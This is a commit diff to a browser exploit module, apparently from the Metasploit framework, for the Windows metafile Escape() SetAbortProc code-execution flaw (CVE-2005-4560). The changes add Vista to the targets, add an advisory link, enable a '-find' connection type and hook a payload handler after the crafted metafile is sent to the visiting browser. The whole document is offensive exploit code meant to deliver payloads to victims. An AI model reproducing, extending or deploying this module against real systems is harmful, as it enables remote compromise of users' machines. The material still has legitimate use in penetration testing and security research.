Updated

git-svn-id: file:///home/svn/incoming/trunk@3301 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/windows/browser/metafile_abortproc.rb

@@ -11,7 +11,7 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Windows XP/2003 Metafile Escape() SetAbortProc Code Execution',
+			'Name'           => 'Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution',
 			'Description'    => %q{
 				This module exploits a vulnerability in the GDI library included with
 				Windows XP and 2003. This vulnerability uses the 'Escape' metafile function
@@ -30,7 +30,8 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
 	  				['BID', '16074'],
 					['CVE', '2005-4560'],
 	  				['OSVDB', '21987'],
-					['MIL', '111'],	
+					['MIL', '111'],
+					['URL', 'http://www.microsoft.com/technet/security/advisory/912840.mspx'],					
 					['URL', 'http://wvware.sourceforge.net/caolan/ora-wmf.html'],
 					['URL', 'http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt'],
 				],
@@ -42,15 +43,15 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
 				{
 					'Space'    => 1000 + (rand(256).to_i * 4),
 					'BadChars' => "\x00",
-					'Compat'   =>
+					'Compat'   => 
 						{
-						#	'ConnectionType' => "-find"
-						}
+							'ConnectionType' => '-find',
+						},
 				},
 			'Platform'       => 'win',
 			'Targets'        =>
 				[
-					[ 'Windows XP/2003 Automatic', { }],
+					[ 'Windows XP/2003/Vista Automatic', { }],
 				],
 			'DisclosureDate' => 'Dec 27 2005',
 			'DefaultTarget'  => 0))
@@ -68,6 +69,8 @@ class Exploits::Windows::Browser::MetafileAbortProc < Msf::Exploit::Remote
 
 		# Transmit the compressed response to the client
 		send_html_gzip_response(cli, generate_metafile(p), { 'Content-Type' => 'text/plain' })
+		
+		handler(cli)
 	end
 	
 	def generate_metafile(payload)